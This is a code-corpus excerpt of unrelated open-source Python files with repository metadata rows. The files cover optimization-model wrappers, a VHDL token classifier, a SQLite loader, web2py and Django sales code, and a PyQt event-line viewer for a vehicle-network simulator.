if not hasattr(IssuerCredential.get_payment_txn, "cb"):
self.logger.debug("vcx_issuer_credential_get_payment_txn: Creating callback")
IssuerCredential.get_payment_txn.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32, c_char_p))
c_credential_handle = c_uint32(self.handle)
payment_txn = await do_call('vcx_issuer_credential_get_payment_txn',
c_credential_handle,
IssuerCredential.get_payment_txn.cb)
return json.loads(payment_txn.decode())
| apache-2.0 | -1,800,778,143,822,007,800 | 45.667575 | 172 | 0.624803 | false |
PythonOptimizers/NLP.py | nlp/model/cysparsemodel.py | 1 | 5725 | try:
from cysparse.sparse.ll_mat import LLSparseMatrix
import cysparse.common_types.cysparse_types as types
except:
print "CySparse is not installed!"
from nlp.model.nlpmodel import NLPModel
from nlp.model.snlp import SlackModel
from nlp.model.qnmodel import QuasiNewtonModel
from pykrylov.linop import CysparseLinearOperator
import numpy as np
class CySparseNLPModel(NLPModel):
"""
An `NLPModel` where sparse matrices are returned as CySparse matrices.
The `NLPModel`'s `jac` and `hess` methods should return sparse
Jacobian and Hessian in coordinate format: (vals, rows, cols).
"""
def hess(self, *args, **kwargs):
"""Evaluate Lagrangian Hessian at (x, z).
Note that `rows`, `cols` and `vals` must represent a LOWER triangular
sparse matrix in the coordinate format (COO).
"""
vals, rows, cols = super(CySparseNLPModel, self).hess(*args, **kwargs)
H = LLSparseMatrix(size=self.nvar, size_hint=vals.size,
store_symmetric=True, itype=types.INT64_T,
dtype=types.FLOAT64_T)
H.put_triplet(rows, cols, vals)
return H
def jac(self, *args, **kwargs):
"""Evaluate constraints Jacobian at x."""
vals, rows, cols = super(CySparseNLPModel, self).jac(*args, **kwargs)
J = LLSparseMatrix(nrow=self.ncon, ncol=self.nvar,
size_hint=vals.size, store_symmetric=False,
itype=types.INT64_T, dtype=types.FLOAT64_T)
J.put_triplet(rows, cols, vals)
return J
try:
from nlp.model.amplmodel import AmplModel
class CySparseAmplModel(CySparseNLPModel, AmplModel):
# MRO: 1. CySparseAmplModel
# 2. CySparseNLPModel
# 3. AmplModel
# 4. NLPModel
#
# Here, `jac` and `hess` are inherited directly from CySparseNPLModel.
#
def A(self, *args, **kwargs):
"""
Evaluate sparse Jacobian of the linear part of the
constraints. Useful to obtain constraint matrix
when problem is a linear programming problem.
"""
vals, rows, cols = super(CySparseAmplModel, self).A(*args, **kwargs)
A = LLSparseMatrix(nrow=self.ncon, ncol=self.nvar,
size_hint=vals.size, store_symmetric=False,
type=types.INT64_T, dtype=types.FLOAT64_T)
A.put_triplet(rows, cols, vals)
return A
def jop(self, *args, **kwargs):
"""Obtain Jacobian at x as a linear operator."""
return CysparseLinearOperator(self.jac(*args, **kwargs))
except ImportError:
pass
class CySparseSlackModel(SlackModel):
"""
Reformulate an optimization problem using slack variables.
New model represents matrices as `CySparse` matrices.
:parameters:
:model: Original model to be transformed into a slack form.
"""
def __init__(self, model, **kwargs):
if not isinstance(model, CySparseNLPModel):
msg = "The model in `model` should be a CySparseNLPModel"
msg += " or a derived class of it."
raise TypeError(msg)
super(CySparseSlackModel, self).__init__(model)
def _jac(self, x, lp=False):
"""Helper method to assemble the Jacobian matrix.
See the documentation of :meth:`jac` for more information.
The positional argument `lp` should be set to `True` only if the
problem is known to be a linear program. In this case, the evaluation
of the constraint matrix is cheaper and the argument `x` is ignored.
"""
m = self.m
model = self.model
on = self.original_n
lowerC = np.array(model.lowerC, dtype=np.int64)
nlowerC = model.nlowerC
upperC = np.array(model.upperC, dtype=np.int64)
nupperC = model.nupperC
rangeC = np.array(model.rangeC, dtype=np.int64)
nrangeC = model.nrangeC
# Initialize sparse Jacobian
nnzJ = self.model.nnzj + m
J = LLSparseMatrix(nrow=self.ncon, ncol=self.nvar, size_hint=nnzJ,
store_symmetric=False, itype=types.INT64_T,
dtype=types.FLOAT64_T)
# Insert contribution of general constraints
if lp:
J[:on, :on] = self.model.A()
else:
J[:on, :on] = self.model.jac(x[:on])
# Create a few index lists
rlowerC = np.array(range(nlowerC), dtype=np.int64)
rupperC = np.array(range(nupperC), dtype=np.int64)
rrangeC = np.array(range(nrangeC), dtype=np.int64)
# Insert contribution of slacks on general constraints
J.put_triplet(lowerC, on + rlowerC,
-1.0 * np.ones(nlowerC, dtype=np.float64))
J.put_triplet(upperC, on + nlowerC + rupperC,
-1.0 * np.ones(nupperC, dtype=np.float64))
J.put_triplet(rangeC, on + nlowerC + nupperC + rrangeC,
-1.0 * np.ones(nrangeC, dtype=np.float64))
return J
def hess(self, x, z=None, *args, **kwargs):
"""Evaluate Lagrangian Hessian at (x, z)."""
model = self.model
if isinstance(model, QuasiNewtonModel):
return self.hop(x, z, *args, **kwargs)
if z is None:
z = np.zeros(self.m)
on = model.n
H = LLSparseMatrix(size=self.nvar, size_hint=self.model.nnzh,
store_symmetric=True, itype=types.INT64_T,
dtype=types.FLOAT64_T)
H[:on, :on] = self.model.hess(x[:on], z, *args, **kwargs)
return H
| lgpl-3.0 | -1,697,829,370,414,543,000 | 35.464968 | 80 | 0.591441 | false |
jeremiah-c-leary/vhdl-style-guide | vsg/vhdlFile/classify/association_element.py | 1 | 1756 |
from vsg.token import association_element as token
from vsg.vhdlFile import utils
def detect(iCurrent, lObjects):
'''
association_element ::=
[ formal_part => ] actual_part
An association element will either end in a close parenthesis or a comma that is not within paranthesis.
accociation_element [)|,]
'''
iOpenParenthesis = 0
iCloseParenthesis = 0
iToken = iCurrent
while not utils.token_is_semicolon(iToken, lObjects):
iToken = utils.find_next_token(iToken, lObjects)
if utils.token_is_open_parenthesis(iToken, lObjects):
iOpenParenthesis += 1
if utils.token_is_close_parenthesis(iToken, lObjects):
iCloseParenthesis += 1
if iCloseParenthesis == iOpenParenthesis + 1:
classify(iCurrent, iToken, lObjects, ')')
return iToken
if iCloseParenthesis == iOpenParenthesis:
if utils.token_is_comma(iToken, lObjects):
classify(iCurrent, iToken, lObjects, ',')
return iToken
iToken += 1
return iToken
def classify(iStart, iEnd, lObjects, sEnd):
iCurrent = iStart
sPrint = ''
for oObject in lObjects[iStart:iEnd + 1]:
sPrint += oObject.get_value()
# Classify formal part if it exists
if utils.find_in_index_range('=>', iStart, iEnd, lObjects):
iCurrent = utils.assign_tokens_until('=>', token.formal_part, iCurrent, lObjects)
iCurrent = utils.assign_next_token_required('=>', token.assignment, iCurrent, lObjects)
# Classify actual part
for iCurrent in range(iCurrent, iEnd):
if utils.is_item(lObjects, iCurrent):
utils.assign_token(lObjects, iCurrent, token.actual_part)
return iCurrent
| gpl-3.0 | -9,160,156,864,442,821,000 | 32.769231 | 108 | 0.646355 | false |
sivareddyg/UDepLambda | scripts/graphquestions/dump_to_database.py | 1 | 1094 | import sys
import json
import random
import os
import sqlite3
items = []
for line in sys.stdin:
sent = json.loads(line)
items.append((sent['id'], sent['sentence']))
random.seed(1)
random.shuffle(items)
random.shuffle(items)
random.shuffle(items)
random.shuffle(items)
conn = sqlite3.connect('working/annotations.db')
c = conn.cursor()
# Create table
c.execute('''CREATE TABLE annotators
(email text PRIMARY KEY NOT NULL, name text, salary real DEFAULT 0.0)''')
c.execute('''CREATE TABLE sentences
(sentid INTEGER PRIMARY KEY, qid INTEGER, sentence text NOT NULL, translated integer DEFAULT 0, translation text, startstamp INTEGER DEFAULT 0, endstamp INTEGER, annotator text)''')
for item in items:
# Insert a row of data
value = {}
value['qid'] = item[0]
value['sentence'] = item[1]
c.execute("INSERT INTO sentences (qid,sentence) VALUES (:qid,:sentence);", value)
# Save (commit) the changes
conn.commit()
# We can also close the connection if we are done with it.
# Just be sure any changes have been committed or they will be lost.
conn.close()
| apache-2.0 | 8,913,069,452,210,691,000 | 27.051282 | 194 | 0.71298 | false |
trosa/forca | applications/ForCA/controllers/profile.py | 1 | 2821 | from operator import itemgetter
@auth.requires_login()
def home():
if auth.has_membership('Professor') and not request.vars:
prof_id = get_prof_id()
redirect(URL(request.application, 'prof', 'home', vars=dict(prof_id=prof_id)))
else:
if request.vars:
aluno_id = request.vars['aluno_id']
else:
aluno_id = get_aluno_id()
request.vars['aluno_id'] = aluno_id
#Verifica se quem ta acessando a página é o próprio aluno ou alguém de fora
if int(aluno_id) == get_aluno_id():
perfil_proprio = True
else:
perfil_proprio = False
if len(request.args):
page = int(request.args[0])
else:
page = 0
limitby = (page*10, (page+1)*11)
aluno = db(db.alunos.id==aluno_id).select(db.alunos.ALL).first()
avaliacoes = db(db.avaliacoes.aluno_id==aluno_id)
#Pega informaçoes do conjunto de avaliações do aluno
evals_stats = get_evals_info(avaliacoes)
#Lista das últimas avaliações do aluno
raw_evals = avaliacoes.select(orderby=~db.avaliacoes.timestamp_eval, limitby=(0,3))
evals = refine_evals(raw_evals)
#Lista das últimas avaliações do aluno, que foram respondidas
avaliacoes_resp = avaliacoes(Avaliacoes.timestamp_reply!=None)
raw_evals = avaliacoes_resp.select(orderby=~Avaliacoes.timestamp_reply, limitby=(0,3))
evals_replyed = refine_evals(raw_evals)
#Lista das avaliações favoritas do user logado no momento
if perfil_proprio:
#raw_favoritos = db((db.favoritos.user_id==session.auth.user.id)&(db.avaliacoes.id==db.favoritos.avaliacao_id)).select(db.avaliacoes.ALL)
#evals_favorited = refine_evals(raw_favoritos)
evals_favorited = get_favorite_evals(session.auth.user.id)
else:
evals_favorited = []
return dict(aluno=aluno, perfil_proprio=perfil_proprio, user_evals = avaliacoes, evals=evals, evals_replyed=evals_replyed,\
evals_favorited=evals_favorited, evals_stats=evals_stats, page=page, per_page=10)
@auth.requires_membership('Aluno')
def favorites():
if len(request.args):
page = int(request.args[0])
else:
page = 0
limitby = (page*10, (page+1)*11)
# if 'aluno_id' in request.vars:
# user_id = get_aluno_user_id(request.vars['aluno_id'])
# else:
user_id = session.auth.user.id
#favorite_evals = db((Favoritos.user_id==user_id)&(Avaliacoes.id==Favoritos.avaliacao_id)).select(Avaliacoes.ALL, limitby=limitby)
refined_favorites = get_favorite_evals(user_id)
return dict(evals=refined_favorites, page=page, per_page=10)
| gpl-2.0 | 2,363,282,468,083,769,000 | 39.085714 | 149 | 0.618674 | false |
alejo8591/maker | sales/models.py | 1 | 18836 | # encoding: utf-8
# Copyright 2013 maker
# License
"""
Sales module objects.
"""
from django.db import models
from maker.core.models import Object, User, ModuleSetting
from maker.identities.models import Contact
from maker.finance.models import Transaction, Currency, Tax
from django.core.urlresolvers import reverse
from datetime import datetime, timedelta, time
from dateutil.relativedelta import relativedelta
from time import time as ttime
from decimal import *
class SaleStatus(Object):
"Status of the Sale"
name = models.CharField(max_length = 512)
use_leads = models.BooleanField()
use_opportunities = models.BooleanField()
use_sales = models.BooleanField()
active = models.BooleanField()
hidden = models.BooleanField()
details = models.TextField(blank = True, null = True)
searchable = False
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_status_view', args=[self.id])
except Exception:
return ""
class Meta:
"SalesStatus"
ordering = ('hidden', '-active', 'name')
class Product(Object):
"Single Product"
name = models.CharField(max_length = 512)
product_type = models.CharField(max_length=32,
default='good',
choices=(('service', 'Service'), ('good', 'Good'),
('subscription', 'Subscription'),
('compound', 'Compound'), ))
parent = models.ForeignKey('self', blank=True, null=True, related_name='child_set')
code = models.CharField(max_length=512, blank=True, null=True)
supplier = models.ForeignKey(Contact, blank=True, null=True, on_delete=models.SET_NULL)
supplier_code = models.IntegerField(blank=True, null=True)
buy_price = models.DecimalField(max_digits=20, decimal_places=2, default=0)
sell_price = models.DecimalField(max_digits=20, decimal_places=2, default=0)
stock_quantity = models.IntegerField(blank=True, null=True)
active = models.BooleanField()
runout_action = models.CharField(max_length=32, blank=True, null=True, choices=(('inactive',
'Mark Inactive'),
('notify', 'Notify'),
('ignore', 'Ignore'), ))
details = models.TextField(blank=True, null=True)
access_inherit = ('parent', '*module', '*user')
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_product_view', args=[self.id])
except:
return ""
class Meta:
"Product"
ordering = ['code']
class SaleSource(Object):
"Source of Sale e.g. Search Engine"
name = models.CharField(max_length = 512)
active = models.BooleanField(default=False)
details = models.TextField(blank=True, null=True)
searchable = False
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_source_view', args=[self.id])
except Exception:
return ""
class Meta:
"SaleSource"
ordering = ('-active', 'name')
class Lead(Object):
"Lead"
contact = models.ForeignKey(Contact)
source = models.ForeignKey(SaleSource, blank=True, null=True, on_delete=models.SET_NULL)
products_interested = models.ManyToManyField(Product, blank=True, null=True)
contact_method = models.CharField(max_length=32, choices=(('email', 'E-Mail'), ('phone', 'Phone'),
('post', 'Post'), ('face', 'Face to Face') ))
assigned = models.ManyToManyField(User, related_name = 'sales_lead_assigned', blank=True, null=True)
status = models.ForeignKey(SaleStatus)
details = models.TextField(blank=True, null=True)
access_inherit = ('contact', '*module', '*user')
def __unicode__(self):
return unicode(self.contact.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_lead_view', args=[self.id])
except Exception:
return ""
class Meta:
"Lead"
ordering = ['contact']
class Opportunity(Object):
"Opportunity"
lead = models.ForeignKey(Lead, blank=True, null=True, on_delete=models.SET_NULL)
contact = models.ForeignKey(Contact)
products_interested = models.ManyToManyField(Product)
source = models.ForeignKey(SaleSource, blank=True, null=True, on_delete=models.SET_NULL)
expected_date = models.DateField(blank=True, null=True)
closed_date = models.DateField(blank=True, null=True)
assigned = models.ManyToManyField(User, related_name = 'sales_opportunity_assigned', blank=True, null=True)
status = models.ForeignKey(SaleStatus)
probability = models.DecimalField(max_digits=3, decimal_places=0, blank=True, null=True)
amount = models.DecimalField(max_digits=20, decimal_places=2, default=0)
amount_currency = models.ForeignKey(Currency)
amount_display = models.DecimalField(max_digits=20, decimal_places=2, default=0)
details = models.TextField(blank=True, null=True)
access_inherit = ('lead', 'contact', '*module', '*user')
def __unicode__(self):
return unicode(self.contact)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_opportunity_view', args=[self.id])
except Exception:
return ""
class Meta:
"Opportunity"
ordering = ['-expected_date']
class SaleOrder(Object):
"Sale Order"
reference = models.CharField(max_length=512, blank=True, null=True)
datetime = models.DateTimeField(default=datetime.now)
client = models.ForeignKey(Contact, blank=True, null=True, on_delete=models.SET_NULL)
opportunity = models.ForeignKey(Opportunity, blank=True, null=True, on_delete=models.SET_NULL)
payment = models.ManyToManyField(Transaction, blank=True, null=True)
source = models.ForeignKey(SaleSource)
assigned = models.ManyToManyField(User, related_name = 'sales_saleorder_assigned', blank=True, null=True)
status = models.ForeignKey(SaleStatus)
currency = models.ForeignKey(Currency)
total = models.DecimalField(max_digits=20, decimal_places=2, default=0)
total_display = models.DecimalField(max_digits=20, decimal_places=2, default=0)
details = models.TextField(blank=True, null=True)
access_inherit = ('opportunity', 'client', '*module', '*user')
def fulfil(self):
"Fulfil"
for p in self.orderedproduct_set.all():
if not p.fulfilled:
product = p.product
product.stock_quantity -= p.quantity
product.save()
p.fulfilled = True
p.save()
if p.subscription:
p.subscription.renew()
def get_next_reference(self):
try:
# Very dirty hack, but kinda works for reference (i.e. it doesn't have to be unique)
next_ref = SaleOrder.objects.all().aggregate(models.Max('id'))['id__max']+1
except:
next_ref = 1
full_ref = '%.5d/%s' % (next_ref, str(str(ttime()*10)[8:-2]))
return full_ref
def save(self, *args, **kwargs):
"Automatically set order reference"
super(SaleOrder, self).save(*args, **kwargs)
try:
conf = ModuleSetting.get_for_module('maker.sales', 'order_fulfil_status')[0]
fulfil_status = long(conf.value)
if self.status.id == fulfil_status:
self.fulfil()
except Exception:
pass
def __unicode__(self):
return unicode(self.reference)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_order_view', args=[self.id])
except Exception:
return ""
def get_taxes(self, base=False):
#TODO: Compound taxes
taxes = {}
ops = self.orderedproduct_set.filter(trash=False).filter(tax__isnull=False)
for p in ops:
if base:
item_total = p.get_total()
else:
item_total = p.get_total_display()
if p.tax.id in taxes:
taxes[p.tax.id]['amount']+=(item_total * (p.tax.rate/100)).quantize(Decimal('.01'), rounding = ROUND_UP)
else:
taxes[p.tax.id] = {'name':p.tax.name, 'rate':p.tax.rate,
'amount':(item_total * (p.tax.rate/100))
.quantize(Decimal('.01'), rounding = ROUND_UP)}
return taxes
def get_taxes_total(self):
taxes = self.get_taxes()
total = 0
for tax in taxes.values():
total += tax['amount']
return total
def get_subtotal(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total()
self.total = sum
return sum
def get_subtotal_display(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total_display()
self.total_display = sum
return sum
def get_total(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total()
sum += self.get_taxes_total()
self.total = sum
return sum
def get_total_display(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total_display()
sum += self.get_taxes_total()
self.total_display = sum
return sum
def update_total(self):
self.get_total()
self.get_total_display()
self.save()
def get_total_paid(self):
return Decimal(self.payment.filter(trash=False).aggregate(models.Sum('value_display'))['value_display__sum'] or '0')
def balance_due(self):
return self.get_total() - self.get_total_paid()
class Meta:
"SaleOrder"
ordering = ['-datetime']
class Subscription(Object):
"Subscription"
client = models.ForeignKey(Contact, blank=True, null=True, on_delete=models.SET_NULL)
product = models.ForeignKey(Product, blank=True, null=True)
start = models.DateField(default=datetime.now)
expiry = models.DateField(blank=True, null=True)
cycle_period = models.CharField(max_length=32,
choices=(('daily', 'Daily'),
('weekly', 'Weekly'),
('monthly', 'Monthly'),
('quarterly','Quarterly'),
('yearly', 'Yearly')),
default='month')
cycle_end = models.DateField(blank = True, null = True)
active = models.BooleanField(default=False)
details = models.CharField(max_length = 512, blank = True, null = True)
access_inherit = ('client', 'product', '*module', '*user')
def get_cycle_start(self):
"Get the cycle start date"
if not self.cycle_end:
return None
cycle_end = self.cycle_end
#check if we're in the 5 day window before the cycle ends for this subscription
if self.cycle_period == 'monthly':
p = relativedelta(months=+1)
elif self.cycle_period == 'weekly':
p = timedelta(weeks = 1)
elif self.cycle_period == 'daily':
p = timedelta(days = 1)
elif self.cycle_period == 'quarterly':
p = relativedelta(months=+4)
elif self.cycle_period == 'yearly':
p = relativedelta(years = 1)
else:
p = relativedelta(months=+1)
cycle_start = cycle_end - p
return cycle_start
def renew(self):
"Renew"
if self.cycle_period == 'monthly':
p = relativedelta(months=+1)
elif self.cycle_period == 'daily':
p = timedelta(days = 1)
elif self.cycle_period == 'weekly':
p = timedelta(weeks = 1)
elif self.cycle_period == 'quarterly':
p = relativedelta(months=+4)
elif self.cycle_period == 'yearly':
p = relativedelta(years = 1)
else:
p = relativedelta(months=+1)
self.cycle_end = datetime.now().date() + p
self.save()
def activate(self):
"Activate"
if self.active:
return
self.renew()
self.active = True
self.save()
def deactivate(self):
"Deactivate"
if not self.active:
return
self.active = False
self.save()
def invoice(self):
"Create a new sale order for self"
new_invoice = SaleOrder()
try:
conf = ModuleSetting.get_for_module('maker.sales', 'default_order_status')[0]
new_invoice.status = long(conf.value)
except Exception:
ss = SaleStatus.objects.all()[0]
new_invoice.status = ss
so = SaleSource.objects.all()[0]
new_invoice.source = so
new_invoice.client = self.client
new_invoice.reference = "Subscription Invoice " + str(datetime.today().strftime('%Y-%m-%d'))
new_invoice.save()
try:
op = self.orderedproduct_set.filter(trash=False).order_by('-date_created')[0]
opn = OrderedProduct()
opn.order = new_invoice
opn.product = self.product
opn.quantity = op.quantity
opn.discount = op.discount
opn.subscription = self
opn.save()
except IndexError:
opn = OrderedProduct()
opn.order = new_invoice
opn.product = self.product
opn.quantity = 1
opn.subscription = self
opn.save()
return new_invoice.reference
def check_status(self):
"""
Checks and sets the state of the subscription
"""
if not self.active:
return 'Inactive'
if self.expiry:
if datetime.now() > datetime.combine(self.expiry, time.min):
self.deactivate()
return 'Expired'
if not self.cycle_end:
self.renew()
cycle_end = self.cycle_end
#check if we're in the 5 day window before the cycle ends for this subscription
if datetime.now().date() >= cycle_end:
cycle_start = self.get_cycle_start()
#if we haven't already invoiced them, invoice them
grace = 3
if (datetime.now().date() - cycle_end > timedelta(days=grace)):
#Subscription has overrun and must be shut down
return self.deactivate()
try:
conf = ModuleSetting.get_for_module('maker.sales', 'order_fulfil_status')[0]
order_fulfil_status = SaleStatus.objects.get(pk=long(conf.value))
except Exception:
order_fulfil_status = None
if self.orderedproduct_set.filter(order__datetime__gte=cycle_start).filter(order__status=order_fulfil_status):
return 'Paid'
elif self.orderedproduct_set.filter(order__datetime__gte=cycle_start):
return 'Invoiced'
else:
self.invoice()
return 'Invoiced'
else:
return 'Active'
def __unicode__(self):
return unicode(self.product)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_subscription_view', args=[self.id])
except Exception:
return ""
class Meta:
"Subscription"
ordering = ['expiry']
class OrderedProduct(Object):
"Ordered Product"
subscription = models.ForeignKey(Subscription, blank=True, null=True)
product = models.ForeignKey(Product)
quantity = models.DecimalField(max_digits=30, decimal_places=2, default=1)
discount = models.DecimalField(max_digits=5, decimal_places=2, default=0)
tax = models.ForeignKey(Tax, blank=True, null=True, on_delete=models.SET_NULL)
rate = models.DecimalField(max_digits=20, decimal_places=2)
rate_display = models.DecimalField(max_digits=20, decimal_places=2, default=0)
order = models.ForeignKey(SaleOrder)
description = models.TextField(blank=True, null=True)
fulfilled = models.BooleanField(default=False)
access_inherit = ('order', '*module', '*user')
def __unicode__(self):
return unicode(self.product)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_ordered_view', args=[self.id])
except Exception:
return ""
def get_total(self):
"Returns total sum for this item"
total = self.rate * self.quantity
if self.discount:
total = total - (total*self.discount/100)
if total < 0:
total = Decimal(0)
return total.quantize(Decimal('.01'),rounding=ROUND_UP)
def get_total_display(self):
"Returns total sum for this item in the display currency"
total = self.rate_display * self.quantity
if self.discount:
total = total - (total*self.discount/100)
if total < 0:
total = Decimal(0)
return total.quantize(Decimal('.01'),rounding=ROUND_UP)
class Meta:
"OrderedProduct"
ordering = ['product']
| mit | -7,272,710,793,605,936,000 | 36.151874 | 124 | 0.552771 | false |
PhilippMundhenk/IVNS | ECUInteraction/gui/plugins/views/event_line_view_impl.py | 1 | 21119 | '''
Created on 27 Apr, 2015
@author: artur.mrowca
'''
from gui.plugins.views.abstract_viewer_plug import AbstractViewerPlugin
from PyQt4.Qt import QWidget
from PyQt4 import QtGui
import pyqtgraph as pg
import numpy as np
from numpy.core.defchararray import isnumeric
from config import can_registration
from io_processing.surveillance_handler import MonitorTags, MonitorInput
from io_processing.result_interpreter.eventline_interpreter import EventlineInterpreter
from tools.general import General
from uuid import UUID
from math import floor
class ECUShowAxis(pg.AxisItem):
def __init__(self, orientation, *args):
pg.AxisItem.__init__(self, orientation, *args)
self.lanes_map = {} # key: number, value: text
def tickValues(self, minVal, maxVal, size):
minVal, maxVal = sorted((minVal, maxVal))
minVal *= self.scale
maxVal *= self.scale
# size *= self.scale
ticks = []
tickLevels = self.tickSpacing(minVal, maxVal, size)
allValues = np.array([])
for i in range(len(tickLevels)):
spacing, offset = tickLevels[i]
spacing = 1
# # determine starting tick
start = (np.ceil((minVal - offset) / spacing) * spacing) + offset
# # determine number of ticks
num = int((maxVal - start) / spacing) + 1
values = (np.arange(num) * spacing + start) / self.scale
# # remove any ticks that were present in higher levels
# # we assume here that if the difference between a tick value and a previously seen tick value
# # is less than spacing/100, then they are 'equal' and we can ignore the new tick.
values = list(filter(lambda x: all(np.abs(allValues - x) > spacing * 0.01), values))
allValues = np.concatenate([allValues, values])
ticks.append((spacing / self.scale, values))
if self.logMode:
return self.logTickValues(minVal, maxVal, size, ticks)
return ticks
def tickStrings(self, values, scale, spacing):
strns = []
for x in values:
try:
text = self.lanes_map[int(x)]
except:
text = ""
strns.append(text)
return strns
class EventlineViewPlugin(AbstractViewerPlugin):
def __init__(self, *args, **kwargs):
AbstractViewerPlugin.__init__(self, *args, **kwargs)
def get_combobox_name(self):
return "Chain of events"
def get_widget(self, parent):
self.gui = EventlineViewPluginGUI(parent)
return self.gui
def get_interpreters(self):
return [EventlineInterpreter]
def link_axis(self):
return self.gui.plot
def load(self, data):
self.gui.load(data)
def save(self):
return self.gui.save()
def update_gui(self, interpreter_input):
self.gui.update_gui(interpreter_input)
class EventlineViewPluginGUI(QWidget):
def __init__(self, parent):
QWidget.__init__(self, parent)
self.lastClicked = []
self._all_points = []
self.create_widgets(parent)
self._lane_map = {}
self._taken_lanes = {}
self.map_points = {}
self.known = []
self.COLOR_ECU_AUTH = (255, 0, 0)
self.COLOR_STR_AUTH = (0, 255, 0)
self.COLOR_SIMPLE = (0, 0, 255)
self.COLOR_PROCESS = (123, 123, 0)
self.COLOR_PROCESS_2 = (0, 123, 123)
self._init_categories()
self._mode = 'LW_AUTH'
self._pts_ecu = {}
def _already_there(self, mon_input):
''' handles duplicates'''
if hash(mon_input) in self.known:
return True
self.known.append(hash(mon_input))
if len(self.known) > 1000:
del self.known[:floor(float(len(self.known)) / 2.0)]
return False
def _clicked(self, plot, points):
for p in self.lastClicked:
p.resetPen()
try: info = points[0].data()
except: info = False
if info:
try: info[5]
except: info += [0, 0, 0, 0, 0]
if len(str(info[2])) > 100:
showos = info[2][:99]
else:
showos = info[2]
self.label.setText("ECU: %s\t\t Time:%s \t\nMessageID: %s \tMessage: %s \t\nSize: %s \t\t\tCorresponding ID: %s \tStream ID: %s" % (info[0], info[-1], self._id_to_str(info[1]), showos, info[3], info[6], info[5]))
for p in points:
p.setPen('b', width=2)
self.lastClicked = points
def _init_categories(self):
# TESLA
self.tesla_time_sync_send = [MonitorTags.CP_SEND_SYNC_MESSAGE, MonitorTags.CP_SEND_SYNC_RESPONSE_MESSAGE]
self.tesla_time_sync_rec = [MonitorTags.CP_RECEIVE_SYNC_RESPONSE_MESSAGE]
self.tesla_setup_send = [MonitorTags.CP_ENCRYPTED_EXCHANGE_FIRST_KEY_KN]
self.tesla_setup_rec = [MonitorTags.CP_RECEIVED_EXCHANGE_FIRST_KEY_KN]
self.tesla_simple_message_send = [MonitorTags.CP_MACED_TRANSMIT_MESSAGE]
self.tesla_simple_message_rec = [MonitorTags.CP_BUFFERED_SIMPLE_MESSAGE]
self.tesla_message_authenticated = [MonitorTags.CP_RETURNED_AUTHENTICATED_SIMPLE_MESSAGE]
self.tesla = self.tesla_time_sync_send + self.tesla_time_sync_rec + self.tesla_setup_send + self.tesla_setup_rec + self.tesla_simple_message_send + self.tesla_simple_message_rec + self.tesla_message_authenticated
# TLS
self.hand_shake_tag_server_send = [MonitorTags.CP_SEND_SERVER_HELLO, MonitorTags.CP_SEND_SERVER_CERTIFICATE, MonitorTags.CP_SEND_SERVER_KEYEXCHANGE, MonitorTags.CP_SEND_CERTIFICATE_REQUEST, MonitorTags.CP_SEND_SERVER_HELLO_DONE, \
MonitorTags.CP_CLIENT_FINISHED_GENERATED_HASH_PRF]
self.hand_shake_tag_server_rec = [MonitorTags.CP_RECEIVE_CLIENT_HELLO, MonitorTags.CP_RECEIVE_CLIENT_CERTIFICATE, MonitorTags.CP_RECEIVE_CLIENT_KEYEXCHANGE, MonitorTags.CP_RECEIVE_CERTIFICATE_VERIFY, MonitorTags.CP_RECEIVED_CHANGE_CIPHER_SPEC, \
MonitorTags.CP_RECEIVE_CLIENT_FINISHED]
self.hand_shake_tag_server_process = [MonitorTags.CP_CLIENT_CERTIFICATE_VALIDATED, MonitorTags.CP_DECRYPTED_CLIENT_KEYEXCHANGE, MonitorTags.CP_DECRYPTED_CERTIFICATE_VERIFY , MonitorTags.CP_GENERATED_MASTER_SECRET_CERT_VERIFY, \
MonitorTags.CP_CLIENT_FINISHED_HASHED_COMPARISON_HASH , MonitorTags.CP_CLIENT_AUTHENTICATED]
self.hand_shake_tag_client_send = [MonitorTags.CP_SEND_CLIENT_HELLO, MonitorTags.CP_SEND_CLIENT_CERTIFICATE , MonitorTags.CP_ENCRYPTED_CLIENT_KEYEXCHANGE , \
MonitorTags.CP_SEND_CIPHER_SPEC , MonitorTags.CP_GENERATED_HASH_FROM_PRF_CLIENT_FINISHED, MonitorTags.CP_GENERATED_HASH_FROM_PRF_SERVER_FINISHED]
self.hand_shake_tag_client_rec = [MonitorTags.CP_RECEIVE_SERVER_HELLO, MonitorTags.CP_RECEIVE_SERVER_CERTIFICATE , MonitorTags.CP_RECEIVE_SERVER_KEYEXCHANGE, \
MonitorTags.CP_RECEIVE_CERTIFICATE_REQUEST, MonitorTags.CP_RECEIVE_SERVER_HELLO_DONE, MonitorTags.CP_RECEIVE_SERVER_FINISHED ]
self.hand_shake_tag_client_process = [MonitorTags.CP_SERVER_HELLO_DONE_VALIDATED_CERT, MonitorTags.CP_ENCRYPTED_CLIENT_KEYEXCHANGE , MonitorTags.CP_GENERATED_MASTERSEC_CLIENT_KEYEXCHANGE , MonitorTags.CP_INIT_SEND_CERTIFICATE_VERIFY, \
MonitorTags.CP_ENCRYPTED_CERTIFICATE_VERIFY, MonitorTags.CP_INIT_CLIENT_FINISHED , MonitorTags.CP_HASHED_CLIENT_FINISHED, MonitorTags.CP_SERVER_FINISHED_HASHED_COMPARISON_HASH , \
MonitorTags.CP_SERVER_FINISHED_GENERATED_HASH_PRF, MonitorTags.CP_INIT_SERVER_FINISHED , MonitorTags.CP_HASHED_SERVER_FINISHED, MonitorTags.CP_SERVER_AUTHENTICATED ]
self.simple_tags_send = [MonitorTags.CP_SESSION_AVAILABLE_SEND_MESSAGE]
self.simple_tags_rec = [ MonitorTags.CP_RECEIVE_SIMPLE_MESSAGE ]
